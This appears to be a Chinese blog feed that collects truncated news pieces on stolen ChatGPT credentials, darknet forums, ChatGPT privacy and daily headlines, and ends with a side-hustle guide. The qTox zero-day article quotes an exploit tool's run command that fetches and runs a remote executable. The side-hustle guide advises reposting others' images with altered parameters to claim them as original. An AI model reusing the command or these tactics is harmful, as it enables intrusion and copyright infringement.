2022年6月至2023年5月期间，超过101100个被盗的OpenAI ChatGPT帐户凭证在非法暗网市场中被发现，仅印度就有12632个被盗的凭证。 Group-IB公司在一份报告中表示，这些凭证是在地下网络犯罪出售的信息窃取日志中发现的。 这家总部位于新加坡的公司表示：“包含被盗取ChatGPT帐户的可用日志数量在2023年5月达到26802个的峰值。”“在过去的一年里，亚太地区经历了最集中的ChatGPT凭证被提供出售的情况。” ChatGPT凭证被盗数量最多的其他国家包括巴基斯坦、巴西、越南、埃及、美国、法国、摩洛哥、印度尼西亚和孟加拉国。 进一步的分析显示，大多数包含ChatGPT账户的日志被臭名昭著的Raccoon信息窃取工具盗取（78348），其次是Vidar（12984）和RedLine（6773）。 信息窃取工具因其能够从浏览器和加密货币钱包扩展劫持密码、cookie、信用卡和其他信息而受到网络犯罪分子的欢迎。 Group-IB表示：“包含信息窃取工具收集的被盗信息的日志在暗网市场上活跃交易。” “有关此类市场上可用日志的其他信息包括日志中找到的域名列表以及有关受感染主机的IP地址的信息。” 它们通常基于订阅定价模式提供，不仅降低了网络犯罪的门槛，而且还成为使用被盗凭证发起后续攻击的渠道。 Group-IB威胁情报主管Dmitry Shestakov表示：“许多企业正在将ChatGPT集成到他们的运营流程中。” “员工输入机密信件或使用机器人优化专有代码。鉴于ChatGPT的标准配置保留了所有对话，如果威胁行为者获得账户凭证，这可能会无意中为他们提供敏感情报的宝库。“ 为了减轻此类风险，建议用户遵循适当的密码要求习惯，并使用双因素身份验证（2FA）保护其帐户，以防止帐户被接管攻击。 这一发展是在一个正在进行的恶意软件活动中出现的，该活动利用假的OnlyFans网页和成人内容的诱惑来提供一个远程访问木马和一个名为DCRat（或DarkCrystal RAT）的信息窃取器，这是AsyncRAT的一个修改版本。 eSentire公司研究人员表：“在观察到的情况下，受害者被引诱下载包含手动执行的VBScript加载程序的ZIP文件。”并指出该活动自2023年1月以来一直在进行。 “文件命名惯例表明，受害者是被利用各种成人电影女演员的露骨照片或OnlyFans内容被引诱的。” 这也是在发现一种名为GuLoader（又名CloudEyE）的恶意软件的新VBScript变体之后，它采用了以税收为主题的诱饵来启动PowerShell脚本，能够检索并将Remcos RAT注入合法的Windows进程中。 这家加拿大网络安全公司在本月早些时候发布的一份报告中表示：“GuLoader是一种高度规避的恶意软件加载程序，通常用于提供信息窃取者和远程管理工具（RAT）。” “GuLoader利用用户启动的脚本或快捷方式文件来执行多轮高度混淆的命令和加密的shellcode。其结果是一个内存驻留的恶意软件有效载荷在一个合法的Windows进程内运行。” OpenAI在一份声明中称：“Group-IB的威胁情报报告的调查结果是人们在设备上被种植恶意软件的结果，而不是OpenAI的数据泄露行为。” “我们目前正在调查已泄露的帐户。OpenAI维护了对用户进行身份验证和授权使用包括ChatGPT在内的服务的行业最佳实践，我们鼓励用户使用强密码并仅在个人计算机上安装经过验证和可信的软件。”...

6月7日，农历润四月二十，星期三 在这里，每天60秒读懂世界 1、广东：高考期间若遇"停课预警"将"停课不停考"；中国中等收入群体已超4亿人，标准曝光：家庭年收入10万元以上； 2、北京：发现两例猴痘病例，为境外输入，两名病例均是通过亲密接触感染； 3、国铁集团恢复动车组大规模采购，103组复兴号动车组，3万辆铁路货车，首批订单或达500亿元； 4、山西：对发生重大林草资源案件、重大林草火灾、重大有害生物灾害的，要严肃追究属地总林长责任； 5、浙江台州：椒江区一渔船4日在维修改造时发生火灾，致4名施工人员死亡；浙江宁海：6日下午，康尔内衣厂区发生机器设备事故，致2人死亡；6日下午，长沙开福一39岁男子驾驶面包车在连撞9人后弃车逃跑，目前已落网； 6、广东肇庆一业主购2楼42套房欲打通：挖掘机吊到室内作业，楼上住宅现裂缝。官方：已移送城管局，初步复核暂不存在结构安全问题；广州拟出新规：电动自行车将分层次、分时段限行； 7、"江西南昌高校鼠头鸭脖"事件争议不断，动物专家发声：若图片属实，80％概率为鼠头； 8、苹果首款头显Vision Pro发布: 采用外置电池设计，通过眼睛、手势和语音实现交互，将于明年上市，售价3499美元。发布会后，苹果股价跌0.76%，市值蒸发6000亿； 9、美方以销售压片机、模具等设备涉芬太尼为由，宣布制裁7个中国实体和6名个人，商务部回应：美方罔顾事实转嫁责任，中方坚决反对； 10、美国共和党总统候选人拉马斯瓦米建议台湾家庭拥枪，外交部回应：不要拿台湾民众当炮灰； 11、马来西亚政府提法案：拟对2007年后出生公民全面禁烟；5日，印度奥里萨邦再次发生列车脱轨事故：系私营水泥厂货运火车，暂无人员伤亡； 12、日媒：福岛第一核电站核污染水排海隧道已于5日下午开始注入海水，核污水排海计划也由此进入最后阶段；日本女子因华航空姐没讲日语暴怒辱骂，航司：致延误40分钟，最后被航警带离； 13、根据中俄年度合作计划，双方6日在日本海、东海相关空域组织实施第6次联合空中战略巡航； 14、外媒：美前情报官员举报称，美国已从坠毁UFO中发现"外星"技术，并利用UFO零件制造武器；北溪管道爆炸新线索：爆破点附近发现潜水靴，与美海军高度相似； 15、外媒：当地6日，乌南部卡霍夫卡大坝被炸毁，正在持续坍塌，已近半！下游新卡霍夫卡市水位上涨已超12米！大量房屋被淹，俄乌互相指责系对方所为；俄国防部：5日，击退乌军在南顿涅茨克的进攻，歼敌1500人、摧毁8辆豹式坦克； 【微语】此去前程远大，你一人，便是千军万马，少年，愿你先折桂花，再逐梦天涯。...

6月5日，农历润四月十八，星期一 在这里，每天60秒读懂世界 1、4日6时33分，神舟十五号载人飞船返回舱成功着陆，带回了拟南芥微重力研究样品，三名航天员报告感觉良好，神舟十五号载人飞行任务取得圆满成功；中国空间站多项太空实验有序展开，首次实现人类干细胞太空早期造血； 2、工信部部长：将加快5G行业虚拟专网建设，全面推进6G技术研发； 3、河南：6月5日至7日小麦抢收重心将转至黄河以北地区，省委书记：已进入决战阶段； 4、4日6时许，四川乐山金口河一国有林场附近发生高位山体垮塌，下方是一矿业公司施工驻地，已造成19人遇难，当地村民：滑落碎石压了宿舍。目前搜救已结束； 5、3日晚，河南洛阳一景观人工湖因暴雨涨水，雨水漫过台阶，两年轻女孩开车误入溺亡，家属：人工湖与机动车道之间没有围栏； 6、加媒：美加军舰3日过航台湾海峡时，中国军舰横切逼美舰改道，险些相撞。美印太司令部：中国导弹驱逐舰逼退美舰"不安全"；中国国防部长：请各国管好自己的军舰飞机。专家:中国军队近距离驱赶将成新常态； 7、多国曾现人类偏肺病毒(HMPV)感染，目前尚无治疗药物和疫苗，常见症状包括咳嗽、发烧、鼻塞、呼吸短促，可发展为支气管炎或肺炎，《柳叶刀》：在2018年已有1.6万儿童死亡； 8、美方称美助理国务卿将于4日至10日访问中国和新西兰，外媒：寻求加强对华沟通； 9、台风"玛娃"影响日本多地，多地强降雨引发洪水、山体滑坡等灾害，已造成2死35伤4失联，约230栋住宅受损，多地停电断水，新干线一度停运； 10、阿联酋5月底宣布：已退出美国主导的"联合海上力量"两个月了，媒体：中东一个新的时代来临；外媒：石油价格疲软，"欧佩克+"考虑进一步减产； 11、巴黎圣日耳曼官宣梅西离队，将签约沙特利雅得新月，报价4亿欧年薪。皇马官宣本泽马离队，其将加盟沙特联冠军吉达联合，税后年薪1亿欧+签约两年。C罗、梅西、本泽马将齐聚沙特； 12、乌干达总统："青年党"武装分子于上周围攻了非洲联盟在索马里的一个基地，大约54名乌干达维和人员因此丧生； 13、金与正痛批：安理会响应"美国强盗要求"，将朝鲜发射侦察卫星作为单独议案讨论，是对真正使命的玩忽职守，盲目跟风美国谴责朝鲜的国家，丑态毕露； 14、印度官方：列车相撞事故救援已完成，正努力恢复铁路服务，死亡人数为275人。印度铁道部部长：事故的发生是"由于电子联锁装置发生变化"。"原因已确定，责任人也已确定"； 15、俄国防部：俄军4日凌晨用高精度武器打击乌军机场，打击目标已实现。指挥所、雷达站、航空技术装备以及武器弹药库都被击毁；北约秘书长与土耳其总统举行会面：为"入约"，瑞典已采取重要步骤以解决土耳其担忧； 【微语】简单事不争吵，复杂事不烦恼。发火时不讲话，生气时不决策。...

图片摄影作者：匡达 界面新闻记者 |丁晶晶 近日，有网友反映，其在使用北京公交APP时，遇到诈骗广告，该广告伪装成登录入口，十分隐蔽，稍不注意就会被扣29.8元。在时度视频报道中，网友点击进入北京公交APP后，页面底部出现“您还未登录”字样的广告，点击进入后输入手机号码点击同意登录，该广告会自动跳转支付宝，如果用户开通免密支付，那么该广告就会直接扣除29.8元。而支付宝上支付信息显示，该商户将每隔7日自动扣费29.8元。时度视频截图5月30日，针对此事，北京公交集团回应表示，针对网传的“北京公交APP”广告问题，北京公交集团发现网上相关情况，立即开展调查后，向“北京公交APP”运营商启迪公交（北京）科技股份有限公司发函要求其迅速整改，目前启迪公交已下线弹窗广告。公开资料显示，北京公交APP是由北京公共交通控股（集团）有限公司和启迪公交（北京）科技股份有限公司（以下简称“启迪公交”）联合打造的一款北京智慧公共出行官方手机软件，开发者为启迪公交。界面新闻浏览北京公交APP发现，在进入页面底部也显示“运营方：启迪公交”字样。启迪公交由北京公交集团的全资子公司北京公交集团资产管理有限公司、启迪控股的全资子公司启迪科技城集团有限公司、北京融沛数据科技有限公司和北京交通集团控股上市公司北京巴士传媒股份有限公司四方于2018年共同发起设立。其中，启迪公交下属全资子公司启交智云承担北京公交刷码乘车系统的设备维护、系统运维、技术开发和客户服务工作。天眼查显示，启迪公交股东中，启迪控股持股35.25%，北京公交集团作为第二大股东持股29.7%。此外，北京公交还是北京巴士传媒股份有限公司的最大股东，通过北京巴士传媒持股启迪公交5.5%。但自去年，百度贴吧和微博上频频传闻启迪公交“跑路”，北京公交APP交由其他方运营。界面新闻发现，天眼查平台上，启迪公交牵涉的一起和中国移动通信的合同纠纷中，启迪公交曾表示，自2022年3月起，北京公交二维码刷码乘车系统的运营维护工作二被告已移交给公交集团。据天眼查该案件文书信息，2022年3月18日，启迪公司向中国移动发出告知函，表示2019年至2022年3月，其提供北京公交刷码乘车业务相关服务已长达3年之多，在没有收到公交集团服务费的情况下，忍辱负重，扎实保障了刷码乘车系统的稳定运营，保障了公共安全和广大乘客的出行权益。应北京公交集团关于数据安全的要求，已将刷码乘车业务安全交接给公交集团，不再提供刷码乘车业务服务。界面新闻拨打启迪公交热线电话，语音提示其未交电话费用而未接通。去年8月，微博博主“北京交通大作战”也曾爆料，北京公交集团和启迪公交出现摩擦，因此北京公交集团独立开发了“一路同行”APP。就此事情的相关细节，界面新闻咨询北京公交集团，截至发稿，北京公交未作答复。   ...

ChatGPT在全球科技行业掀起了生成式人工智能的“军备竞赛”，但是人们对生成式人工智能（AIGC）的合规风险普遍认识不足。 Gartner最近撰文指出，企业法务和合规负责人应该认知并解决企业面临的六种ChatGPT（包括其他基于大语言模型的生成式人工智能工具）合规风险，并开始建立护栏确保企业能安全且负责任地使用生成式人工智能工具。 “ChatGPT和其他大型语言模型工具容易产生多种风险，”Gartner法律与合规实践高级总监分析师冉弗里德曼（Ron Friedmann）指出：“法律和合规领导者应评估这些问题是否对其企业构成重大风险，以及在企业内部及其第三方/多方推广AI应用时企业内部需要采取哪些控制措施。否则，企业可能会面临法律、声誉和财务方面的严重后果。 法务和合规负责人应评估的六大ChatGPT风险包括（同样适用于其他大语言模型工具）： 01 捏造的或失实信息 ChatGPT和其他大语言模型工具最常见的问题是倾向于提供不正确的（尽管表面上合理的）信息。 “ChatGPT也容易产生'幻觉'，包括捏造答案，以及不存在的法律或科学引用，”弗里德曼说：“法律和合规领导者应该发布指导意见，要求员工在采信答案之前审查大语言模型工具生成内容是否准确、恰当和实用。” 02 数据隐私和机密性 法律和合规领导者应该意识到，输入到ChatGPT中的任何信息，如果未关闭聊天记录功能，都可能成为其训练数据集的一部分。 “提示词中使用的敏感、专有或机密信息可能会被用于回复企业外部用户的提问，”弗里德曼说：“法律和合规部门需要为ChatGPT的使用建立一个合规框架，并明确禁止将敏感的组织或个人数据输入公共大语言模型工具。 03 模型和输出偏差 尽管OpenAI努力减少ChatGPT中的偏见和歧视，但这些问题的案例已经频频发生，尽管OpenAI和其他公司正在积极努力将这些风险降至最低，但这个问题可能会永远存在。 “大语言模型不太可能完全消除偏见，因此法务和合规人员需要掌握管理人工智能偏见的法律，并确保合规性，”弗里德曼说：“这可能需要与专家合作，以确保人工智能生成可靠内容，并通过审计和技术功能进行数据质量控制。” 04 知识产权（IP）和版权风险 大语言模型工具，尤其是ChatGPT，训练时使用了大量互联网数据，其中可能包括受版权保护的材料。因此，ChatGPT之类的大语言模型输出的内容也有可能侵犯版权或知识产权保护。 “ChatGPT没有提供其内容生成的具体原理和机制，”弗里德曼说：“法律和合规领导者应该密切关注适用于ChatGPT（以及其他生成式人工智能工具）输出内容相关版权法规的任何变化，并要求用户仔细审查他们生成的内容，以确保不侵犯版权或知识产权。” 05 网络欺诈风险 不法分子已经在滥用ChatGPT来大规模生成虚假信息（例如，虚假评论）。 此外，集成或接入大语言模型模型（包括ChatGPT）的应用程序也容易受到提示注入攻击的影响。所谓提示注入攻击是一种黑客技术，攻击者使用恶意对抗性提示诱骗人工智能模型执行违反其内容审核规则的任务，例如编写恶意软件代码或开发网络钓鱼站点。 “法务和合规领导者应与网络安全风险负责人协调，探讨是否或何时就此问题向公司网络安全人员发布备忘录，”弗里德曼补充道：“他们还应该对信息来源进行尽职调查和审计，以验证信息的质量。 06 消费者保护风险 如果企业的应用（例如客服聊天机器人）未能向消费者披露是否使用了生成式人工智能技术（例如ChatGPT），企业将面临失去客户信任的风险，甚至可能遭到起诉。 例如，美国加利福尼亚州的聊天机器人法律要求，在某些消费者互动中，企业必须清晰、明确地告知消费者正在与机器人进行交流。 法务和合规负责人需要确保企业的大语言模型应用（例如ChatGPT）符合所在司法辖区内的所有相关法规和法律，并已向客户进行了适当的披露。   ...

“Kirin博客”曾经科普过Tox ，Tox是一个免费的点对点即时消息传递和视频电话网络协议，可实现加密数据交换。该项目的目标是创建一个安全且易于使用的通信平台。Tox与Tor的结合，可以实现在暗网下完全匿名点对点通信。其中，qTox是使用比较多的客户端。 近期，在流行的暗网犯罪论坛XSS.is中，高级用户nightly（注册时间为2019年4月10日）宣布以20BTC（52.95万美元）的价格出售暗网上流行的聊天软件qTox最新版本（1.17.6）的漏洞，该漏洞为远程代码执行漏洞。 为了证明qTox确实存在远程代码执行（RCE）类型的零日漏洞，作者上传并引用了一个包含访问并执行的详细操作信息的GIF图片。该图片向大家展示的是，对于实施攻击而言，用户接受发送给他的通信请求就足够了。 nightly写道：“一方面，担保人可以由我承担费用，无论谁有定金——我把它扔出去，转让来源并帮助购买后如何使用它。我不会完成任何事情，因为我的脑袋被这些狗屎代码烧得沸腾了。这已经是你的编码器的任务了。” 根据该贴文，影响以下版本： You are using qTox version v1.17.6. toxcore version: 0.2.13 Commit hash: 54345d1085628950af4176e6b4873513db0de4f3 Qt version: 5.7.1 信息安全市场的一些主要参与者几乎立即对此做出了反应。特别是，vx-underground在他们的Telegram频道上写道，该漏洞“将允许攻击地球上几乎所有的勒索软件团伙与威胁行为者。” > A TOX 1.17.6 (current version) RCE 0day is for sale. > > It would give nerds the ability to pwn literally every ransomware group, and major Threat Actor, on the planet. All it requests is sending a friend request, and the other person accepting it. > > It is being sold for $500,000 > > — vx-underground (@vxunderground) [May 25, 2023](https://twitter.com/vxunderground/status/1661789069670780934?ref_src=twsrc%5Etfw) 5月25-26日晚上，跟帖中出现漏洞已售出的消息，没有提供买家信息。 值得注意的是，远程代码执行（RCE）漏洞允许远程代码注入服务器脚本，这在所有可能的情况下都会导致资源或应用程序遭到黑客攻击。因此，攻击者可以快速控制并访问受害者的设备。 运行示例： ./detox “https://***.zip/test.exe” 与此同时，勒索软件团伙Lockbit宣布终止使用Tox作为与其联系的方式，另外，XSS.is管理员也从他们简介的信息中删除了Tox通信方法的hash。 Lockbit勒索软件团伙管理人员说：“现在我要如何结交新朋友？不要在 qTox 上给我发消息，我只有老朋友）））” XSS.is管理员表示，删除自己的tox的原因是他们的客户存在很多问题，而且没有及时更新，他说：“我对这个漏洞了解不多，但它与qtox有关，不是tox的核心，他说我们正在寻找替代方法或相同的方法。”我们将返回tox，Telegram绝对不是一个替代方案。...

5月31日，农历润四月十三，星期三 在这里，每天60秒读懂世界 1、30日，神舟十六号成功发射，3名航天员顺利进驻中国空间站，美媒点赞：中国航天计划再迈新台阶； 2、两部门：鼓励各类全日制高校学生参加基本医保；上海：支持民间投资与国有资本联合参与重大项目投资建设； 3、2023新一线城市名单官宣：呈现"南强北弱"格局，成都、重庆、杭州、武汉、苏州、西安、南京、长沙、天津、郑州、东莞、青岛、昆明、宁波、合肥等15座城市入选； 4、河南遭遇10多年来最严重"烂场雨"，致多地待收割小麦发霉发芽。河南：多举措抢收夏粮，紧急下拨2亿元专项用于小麦烘干；河南商丘一县法院工作人员严重违法被查：初中学历未满19岁入职，官方：是临时打字员； 5、上海热盘云锦东方：暂停销售摇号，因摇号选房时间暂不确定，如需退出本次认购活动的可退还认购金。该盘曾被称为"买到躺赚2000万"； 6、广东东莞虎门镇一社区干部薪酬表引关注，"平均月薪2万元"，社区回应：只算中等水平，附近社区更高； 7、吴谢宇弑母案二审维持死刑原判：作案时具有完全的辨认和控制能力。旁听人员：他听到判决后人很呆，没说一句话； 8、浙江自然资源厅一处长在地铁猥亵他人被拘12日！官方：已免职，并调离公务员队伍； 9、快播公司宣告破产，公司已注销，此前因版权侵权、传播淫秽信息等被查封，公司创始人王欣曾获刑入狱，2018年出狱； 10、美国国防部：中方拒绝了中美防长在香格里拉对话会会面的请求。外交部：原因美方是清楚的； 11、外媒：埃尔多安在确认胜选的次日就找美国买F-16战机，拜登：你先同意瑞典加入北约； 12、外媒：科索沃局势升级，科索沃塞族抗议者与北约部队当地29日发生暴力冲突，已致25名北约士兵和52名塞族人受伤，北约向科索沃北部增兵，塞尔维亚仍不让步。武契奇：已将塞军的战斗警报设为最高级别，有人要当下一个泽连斯基； 13、马来西亚当地29日扣押了一艘中国船只，称其涉嫌非法打捞二战英国名舰残骸，英国：深感痛心 ，相关人士：或是中国注册的船只，但租给了马来西亚一家船舶公司； 14、外媒：马斯克私人飞机30日降落北京，将会见中国高级官员并参观特斯拉的上海工厂，外交部：欢迎各国工商界人士访华； 15、30日，俄首都莫斯科市区遭无人机袭击，多个建筑物受损，暂无人伤亡，无人机被击落爆炸，俄外交部：保留采取最严厉回应措施的权利；乌防长：不会攻击俄领土，争取建立正常关系；俄国防部：俄军对乌数个决策中心实施导弹打击；俄媒：俄内务部通缉乌军总司令扎卢日内；捷克军队高官：俄与北约爆发战争并非不可能发生； 【微语】在喜欢的状态里生活，做你自己就好，生活不在富足而在于满足，保持对生活的热爱，便是治愈生活的良药，眼下即是最真实的生活。...

在美国司法部查封这个臭名昭著的网络犯罪论坛一年后，包含近50万RaidForums用户详细信息的数据库在网上泄露。 泄露的数据库发布在Exposed论坛上，安全研究人员将其描述为一个新兴的论坛，“希望填补最近BreachForums关闭留下的空白”。 “Kirin博客”访问了这个最新的数据泄露论坛，也是使用MyBB程序搭建，与RaidForums以及BreachForums看上去很相像。该论坛的公告称，Exposed论坛的暗网镜像网站将很快推出。 从RaidForums到BreachForums，最后到Exposed Forums RaidForums于2015年推出，曾经是一个广受欢迎的平台，发展成为世界上最大的黑客论坛之一。网络犯罪分子主要使用它来买卖被盗的数据库。其中包括加密货币钱包服务Gatehub的超过一百万个密码，以及数百万个被盗的T-Mobile客户帐户。据报道，Lapsus$黑客组织也使用了该黑客论坛。 美国司法部宣布，作为国际执法行动的一部分，它已于2022年4月没收了RaidForums的网站和基础设施。RaidForums的管理员，被称为“Omnipotent”，和他的两个同伙也被逮捕。检察官说，在该论坛被查封之前，有数百个包含超过100亿条个人记录的被盗数据的数据库被出售。 RaidForums被摧毁后，黑客社区聚集在一个名为BreachForums的新论坛中继续他们的非法活动，BreachForums服务于相同的目的和受众。然而，FBI在2023年3月逮捕了BreachForums的创始人“pompompurin”。“Pompompurin”被捕几天后，该论坛的共同管理员“Baphomet”担心执法部门可能会访问BreachForums的服务器，因此宣布他们永久关闭该论坛。 为了填补BreachForums留下的市场空白，最近推出了一个名为Exposed的新黑客论坛，并迅速受到欢迎。 Exposed论坛的管理员“Impotent”泄漏RaidForums用户的数据库 2023年5月29日，Exposed论坛的管理员“Impotent”公开了RaidForums成员数据库，其中包括47.8万名用户的详细信息，包括他们的用户名、电子邮件地址、哈希密码和注册日期。这些数据现在可供其他威胁参与者、研究人员和执法部门使用。 此外，他们已将此信息作为公告发布在其网站上。 泄露的数据已经可以下载，包括一个包含RaidForums 成员注册信息的SQL文件。这些数据源自RaidForums论坛使用的软件程序（MyBB）中的“mybb_users”表，该表用于存储用户名、电子邮件地址、哈希密码、注册日期和其他相关论坛相关信息等详细信息。 在泄露的数据表中，有478870名在2015年3月20日至2020年9月24日期间注册的RaidForums会员的信息，这表明该数据库在此期间被转储。 Exposed论坛的管理员在帖子中说：“所有在raidforums上的用户可能都被泄露了。”RaidForums在去年关闭时拥有大约55万名用户。 管理员补充说，部分RaidForums用户的详细信息已从数据库中删除，但尚不清楚有多少或背后的原因。 数据库中的大量账户包含已知的注册信息这一事实支持了泄露表的真实性。Exposed论坛的一些成员也确认了他们的信息存在于该MySQL数据表中。 在RaidForums被美国当局查封后，暴露的数据可能已经掌握在执法部门手中，但这些数据对安全研究人员来说仍然很有价值。他们经常利用此类信息来构建威胁参与者的档案，并可能发现与其他恶意活动的联系。 黑客群里在热议，认为Exposed论坛可能是FBI的蜜罐 Telegram中的多个黑客群组中，针对RaidForums数据泄露进行了激烈讨论。 从RaidForums到BreachForums，都是基于PHP论坛程序MyBB搭建，有黑客怀疑，是否MyBB或者其插件存在未公开的0day漏洞，并表示，如果存在，Exposed论坛可能就是下一个被查封的论坛。 还有多名黑客怀疑，Exposed论坛极可能是FBI的蜜罐，因为联邦调查局有该数据库。...

ChatGPT从发布至今曾闹出了不少隐私安全问题，先是意大利暂时封杀ChatGPT，限制OpenAI处理本国用户信息。接着，据韩国媒体报道，三星在使用ChatGPT不到20天，便曝出机密资料外泄。ChatGPT是否会保存用户数据或利用用户数据，并没有人专门分析过，笔者接下来将就这一问题逐一进行解密。 数据授权 根据OpenAI的公告，从2023年4月25日起，用户可以自由禁用对话记录，这样对话就不会再出现在侧边栏上。 一句话总结OpenAI的隐私策略就是：此前，用户只能按需定期清除聊天记录，但任何对话OpenAI仍可用于模型训练微调。截至目前为止，如果对话记录被禁用，对话只会保留30天，然后OpenAI会永久删除它们。 要禁用ChatGPT的对话记录非常简单，访问Web界面中的设置，导航至主页的左下部分，将弹出一个小窗口： 切至”Data controls“，我们可以看到这一项下面的一行小字，你的聊天记录将会被允许ChatGPT进行模型训练。 数据导出 OpenAI在ChatGPT的设置中还添加了一个新功能：一个导出选项，用于获取您的ChatGPT数据，并找出ChatGPT存储了哪些关于您的信息。 确认导出操作后，在邮箱中收到如下的内容： 我们会发现用户所有的数据实际上都存储在微软的Azure Blob Storage里。 数据文件 整个用户对话记录数据分为5个文件： chat.html (对话记录网页) conversations.json （对话记录数据） message_feedback.json （用户质量反馈数据，用于强化学习） model_comparisons.json （用户点击重新生成答案的二次对话数据） user.json （用户信息数据） 通过JSON文件分析，我们还发现了一些有意思的技术细节: ChatGPT的对话和OpenAI官方API的定义一致，也分为system、user和assistant三个角色。并且每次对话会和上一次user提问保持一级父子关系，估计官方是以这种user提问链的方式来维持对话记忆。   数据隐私 通过导出的对话记录，可以确定OpenAI保留了关于用户与ChatGPT交互的所有信息！ 值得注意的是，如果用户不关闭”对话记录和导出个人数据“功能，OpenAI就默认用户授权可以使用用户对话记录数据训练模型。这是一个大坑，要便利就没有隐私。 OpenAI这个对话记录数据导出功能明显是遵循了欧盟通用数据保护条例(GDPR) ，因为GDPR明确定义了厂商处理用户数据的义务，用户需要可以自由访问受其个人约束的所有用户数据，这也是就是为什么谷歌等互联网厂商在收集个人信息时有义务随时向用户提供他们从哪里获得数据的原因。 用户隐私和商业利益是AI厂商目前的一个矛盾难题。但是，透明度仍然是厂商和用户之间建立信任和确保所有人安全地使用AI的关键！      ...

5月30日，农历润四月十二，星期二 在这里，每天60秒读懂世界 1、全国多地高温预警：部分地区已超40摄氏度。中国气象局：未来三天，华南、江南、贵州、云南、四川等多地有35℃以上高温天气，部分地区可达37~39℃，局地40℃； 2、民政部：要推动社区充分挖掘社区服务需求，开发社区服务岗位，鼓励和支持高校毕业生在社区内就业； 3、官方：我国载人月球探测工程登月阶段任务已启动实施，计划在2030年前实现中国人首次登陆月球；神舟十六号于30日9时31分发射，神十六航天员乘组公布：景海鹏、朱杨柱、桂海潮。 4、教育部：研究推动京津优质中小学基础教育资源同河北共享；应急管理部：拟向教育部申报设立应急管理大学，办学地点在廊坊； 5、北京等地开始接种国内首款四价新冠疫苗，针对四种变异株，由神州细胞公司研发生产； 6、上海：6月1日起试点婚姻登记跨省通办，一方持上海居住证，就可办理； 7、农行：6月30日后将陆续对符合长期不动特征的存折账户进行销户处理；恒大地产：截至4月末涉及未能清偿的到期债务累计约2724.79亿元； 8、湖北潜江市一食品公司发生氮气窒息事故，虾仁速冻车间1死18伤；28日早，安徽省安庆桐城一加工厂发生有限空间事故，致3死1伤，安徽省安委会挂牌督办； 9、河南：十大举措保障夏粮抢收，最大限度减少小麦霉变，优先保住小麦种子、落实跨区机收免费通行； 10、台军称山东舰航母编队再穿台海，专家：过航已常态化，无须对号入座； 11、土耳其20年"掌舵人"埃尔多安赢得史上最艰难选举，再次当选总统，拜登、苏纳克、普京、泽连斯基等祝贺； 12、美媒称中方要求"允许俄占据现在占领的乌部分领土"，外交部回应：没有这回事，请以中方发布的消息稿为准； 13、美媒：当地28日，美国艾奥瓦州达文波特市一六层公寓楼部分坍塌致多人受伤，救援人员正搜寻失踪人员； 14、日本：接到朝方通报，朝鲜将在5月31日至6月11日间发射军事侦察卫星，谴责朝鲜违反安理会决议，要求朝方"保持克制，不要发射"。韩国警告朝鲜不要发射；岸田文雄希望为就解决"朝鲜绑架日本人"问题，举行日朝首脑会谈，朝方：若立场不变谈判是"浪费时间"； 15、俄媒：普京29日签令废止《欧洲常规武装力量条约》。并批准了俄罗斯与吉尔吉斯斯坦建立联合区域防空系统的协议；乌军总司令：当地28日夜晚至29日凌晨，俄军向乌克兰发射了至少40枚导弹，出动约35架无人机，其中至少37枚导弹和29架无人机被乌军击落。基辅市中心接连传出爆炸声：燃烧导弹残骸坠落，民众地铁中避难； 【微语】每个人都想，苦了，有人疼。久了，有人忆。远了，有人牵。但现实告诉我们，生活，要自己忙。苦累，要自己扛。...

大家好，我是钱幕。时光如梭，兔年已过去三分之一，如果你还在找项目，请先停一停，听我一言，我们选择项目要做能够产生复利的项目，也就是有沉淀、可以持续做的项目，否则的话，到十年后，2033年，你依然还在找项目做项目的死循环里。 今天给大家分享6个人人可操作的互联网副业项目，这些项目你不用怀疑，只要坚持做，是一定可以拿到结果的。废话不多说，直接上项目。这些项目我都有写实操，本篇仅作讲解汇总。内容篇幅较长，纯干货分享，建议耐心阅读。 1、抖音中视频计划 中视频计划是抖音、西瓜、头条三方发起的创作激励计划，只要在平台发布16:9的视频，只要有播放，官方就给你发钱。活动开通条件，第一个，发布三个作品，第二个，总播放量大于16000，一般对于剪辑新手来说，3个视频是达不到播放要求的，对于新手，一边练习了剪辑技术，一边完成任务，其实也挺不错的。当做几个视频上手以后，也刚好开通了计划，以后发布作品就有了收益。 聊聊关于新手选择赛道的问题，如果你没有能力做原创，那么可以选择做二创，也就是把一些猎奇的视频拿过来深加工剪辑，自己重新配音，根据配音内容将画面剪辑重新组合到一起，形成一个全新的作品。这种创作方式，官方也是认可的。就比如剪辑动物世界，荒野求生，、荒野建造、电影、电视剧、动画片、全部都可以做。唯一需要注意的就是B权问题，对于国产的电影电视剧动画片，要特别注意，特别是新出的剧。老电视剧电影动画片随便剪辑，都没有问题的，国外资源的话不用太担心，问题不大。 新手不知道怎么判断的可以确定素材后现在抖音搜一下，有没有同行剪了，这是个长期项目，做得越久收入越高，哪怕你哪天不更新了，每天依然有钱进账。关于中视频计划，我之前写过一篇非常详细的实战攻略。 2、抖音壁纸号项目 其实抖音壁纸号项目是比较适合新手的，相当于上面的中视频来说，上手难度几乎为0，完全就是搬砖项目，先讲一下变现思路，我们把收集的图片上传到抖音的图片小程序，然后我们选几张好看的图片发布抖音图文，通过图文，有人喜欢就想要原图，通过我们留的引导，引导他进入小程序，只有付费或看广告才可以下载，这样我们就产生了收益。 把全网图片搬到抖音来，没错，我们就是搬运工，图片网站：小红书、知乎、公众号、微博，我们去这些平台多找点分享壁纸的账号，把更新比较频繁的全关注一遍，这样图片问题就解决了，这里有个小技巧，为了解决原创的问题，我们需要对图片参数进行调整，我们把图片参数改了这就是一张原创的图片了。 把图片上传到抖音小程序里，然后一组照片挑选几张好看的发图文引流。视频播放起来后，在评论区留钩子，观众看见了有兴趣的会顺着钩子去找小程序然后下载图片。整个项目闭环就是如此，项目操作门槛比较低，我很推荐大家来做的。特别是新人朋友，不信你抖音搜一下，很多人做得很好。也赚到钱了。 这是一个长期项目，随着发的作品越来越多，你的收益会节节攀升。中后期即便你不更新了，依然每天都有钱拿，完全是躺赚。 3、闲鱼无货源项目 这是个老掉牙的项目了，对于老司机，可能会嗤之以鼻，但是，闲鱼的火热经久不衰是有原因的，闲鱼都快十多年了，现在反而比之前还火，就是越来越多的人对于二手产品的需求越来越大导致的。 